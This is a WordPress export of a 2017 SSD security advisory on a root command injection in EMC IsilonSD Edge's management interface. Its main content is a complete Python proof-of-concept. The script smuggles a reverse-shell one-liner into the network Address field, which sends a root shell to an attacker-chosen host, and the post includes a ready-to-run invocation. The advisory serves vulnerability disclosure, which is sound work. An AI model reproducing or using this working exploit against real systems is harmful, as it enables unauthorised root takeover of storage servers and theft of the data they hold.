{"id":8221,"date":"2017-07-02T14:19:10","date_gmt":"2017-07-02T22:19:10","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/07\/02\/news-1996\/"},"modified":"2017-07-02T14:19:10","modified_gmt":"2017-07-02T22:19:10","slug":"news-1996","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/07\/02\/news-1996\/","title":{"rendered":"SSD Advisory \u2013 EMC IsilonSD Edge Command Injection"},
"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Sun, 02 Jul 2017 08:09:16 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:ssd@beyondsecurity.com\">ssd@beyondsecurity.com<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a Remote Command Injection vulnerability found in EMC IsilonSD Edge version 1.0.1.0005.<\/p>\n<p>IsilonSD Edge enables you to deploy an industry-leading scale-out NAS operating system on industry-standard hardware. Key benefits of IsilonSD Edge: a simple yet powerful and efficient scale-out storage solution for remote and branch offices; easy extension of your enterprise data lake from the core data center to edge locations; and consolidation and distribution of unstructured data.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Nahuel D. S\u00e1nchez from vvvSecurity, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> We informed EMC of the vulnerability on the 24th of April 2017; the last email we received from them was on the 30th of May 2017. We have no further updates from EMC regarding the availability of a patch or a workaround for the vulnerability.<\/p>\n<p><span id=\"more-3252\"><\/span><\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> A remote authenticated attacker can misuse the IsilonSD management tools (located at https:\/\/&lt;isilonsd_ip&gt;:5480) to execute arbitrary OS commands. The vulnerability lies in the lack of backend validation when the network configuration is performed. There is some front-end validation, but it can be bypassed.<\/p>\n<p>If an attacker accesses the application and changes the hostname to something like &#8220;localhost; uname -a&#8221;, the &#8220;uname -a&#8221; command will be executed with root privileges.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> A reverse shell with root privileges will be triggered by this PoC.<\/p>\n<p>Execute the PoC as follows:<\/p>\n<p>python os_command_injection.py https:\/\/&lt;ip&gt;:5480 &lt;host to receive the reverse shell&gt; &lt;port for the shell&gt; administrator &lt;administrator password&gt;<\/p>\n<p><u>os_command_injection.py<\/u><\/p>\n<pre><code class=\"language-python\">import requests\nimport sys\n\nfrom requests.auth import HTTPBasicAuth\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nif len(sys.argv) &lt;&gt; 6:\n    print \"usage script.py &lt;target_url&gt; &lt;attacker_host&gt; &lt;attacker_port&gt; &lt;username&gt; &lt;password&gt;\"\n    exit()\n\ntarget_url = sys.argv[1]\nattacker_host = sys.argv[2]\nattacker_port = sys.argv[3]\nusername = sys.argv[4]\npassword = sys.argv[5]\n\n# CIM-XML request headers; CIMMethod and CIMObject are percent-encoded\nheaders = {\"Content-Type\": \"application\/xml; charset=UTF-8\", \"Cache-Control\": \"no-cache\", \"CIMProtocolVersion\": \"1.0\", \"CIMOperation\": \"MethodCall\", \"CIMMethod\": \"%53%65%74%564%41%6E%64%566%4E%65%74%77%6F%72%6B%53%65%74%74%69%6E%67\", \"CIMObject\": \"%72%6F%6F%74\/%63%69%6D%762%3A%56%41%4D%49_%4E%65%74%77%6F%72%6B%53%65%74%74%69%6E%67.%4E%61%6D%65%3D%22%65%74%680%22%2C%53%65%72%76%65%72%4E%61%6D%65%3D%22%6C%6F%63%61%6C%68%6F%73%74%22\"}\n\nshellcode = '''python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"\/bin\/sh\",\"-i\"]);' ''' % (attacker_host, attacker_port)\n\n# SetV4AndV6NetworkSetting method call; the Address value carries the injected command (see Vulnerability Details)\npayload = '''&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\n&lt;CIM CIMVERSION=\"2.0\" DTDVERSION=\"2.0\"&gt;&lt;MESSAGE ID=\"11\" PROTOCOLVERSION=\"1.0\"&gt;&lt;SIMPLEREQ&gt;&lt;METHODCALL NAME=\"SetV4AndV6NetworkSetting\"&gt;&lt;LOCALINSTANCEPATH&gt;&lt;LOCALNAMESPACEPATH&gt;&lt;NAMESPACE NAME=\"root\"\/&gt;&lt;NAMESPACE NAME=\"cimv2\"\/&gt;&lt;\/LOCALNAMESPACEPATH&gt;&lt;INSTANCENAME CLASSNAME=\"VAMI_NetworkSetting\"&gt;&lt;KEYBINDING NAME=\"Name\"&gt;&lt;KEYVALUE VALUETYPE=\"string\"&gt;eth0&lt;\/KEYVALUE&gt;&lt;\/KEYBINDING&gt;&lt;KEYBINDING NAME=\"ServerName\"&gt;&lt;KEYVALUE VALUETYPE=\"string\"&gt;localhost&lt;\/KEYVALUE&gt;&lt;\/KEYBINDING&gt;&lt;\/INSTANCENAME&gt;&lt;\/LOCALINSTANCEPATH&gt;&lt;PARAMVALUE NAME=\"Address\" PARAMTYPE=\"string\"&gt;&lt;VALUE&gt;192.168.1.162; %s&lt;\/VALUE&gt;&lt;\/PARAMVALUE&gt;&lt;PARAMVALUE NAME=\"GatewayV4\" PARAMTYPE=\"string\"&gt;&lt;VALUE&gt;192.168.1.1&lt;\/VALUE&gt;&lt;\/PARAMVALUE&gt;&lt;PARAMVALUE NAME=\"SubnetMask\" PARAMTYPE=\"string\"&gt;&lt;VALUE&gt;255.255.255.0&lt;\/VALUE&gt;&lt;\/PARAMVALUE&gt;&lt;PARAMVALUE NAME=\"AddressVersions\" PARAMTYPE=\"string\"&gt;&lt;VALUE&gt;STATICV4+AUTOV6&lt;\/VALUE&gt;&lt;\/PARAMVALUE&gt;&lt;\/METHODCALL&gt;&lt;\/SIMPLEREQ&gt;&lt;\/MESSAGE&gt;&lt;\/CIM&gt;''' % shellcode\n\ntry:\n    print \"Launching exploit against %s\" % target_url\n    print \"Expecting to receive a reverse shell on host %s port %s\" % (attacker_host, attacker_port)\n    print \"After a few seconds check your netcat...\"\n    res = requests.post(target_url + \"\/cimom\", auth=(username, password), data=payload, headers=headers, verify=False)\n    if res.status_code == 401:\n        print \"Invalid credentials were specified\"\n    elif res.status_code &lt;&gt; 200:\n        print \"There was an error...\"\n        print res.status_code\n        print res.reason\nexcept Exception as e:\n    print \"There was an error...\"\n    print e<\/code><\/pre>\n<\/div>\n<\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3252\" target=\"bwo\">https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},
"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Sun, 02 Jul 2017 08:09:16 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a Remote Command Injection vulnerability found in EMC IsilonSD Edge version 1.0.1.0005. IsilonSD Edge enables you to deploy an industry-leading scale-out NAS operating system on industry-standard hardware. Key benefits of IsilonSD Edge: a simple yet powerful and efficient scale-out storage solution for remote and branch offices; easy extension of your enterprise &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3252\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 EMC IsilonSD Edge Command Injection<\/span><\/a><\/p>\n","protected":false},
"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11682,10757],"class_list":["post-8221","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-code-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8221","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=8221"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8221\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=8221"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=8221"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=8221"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}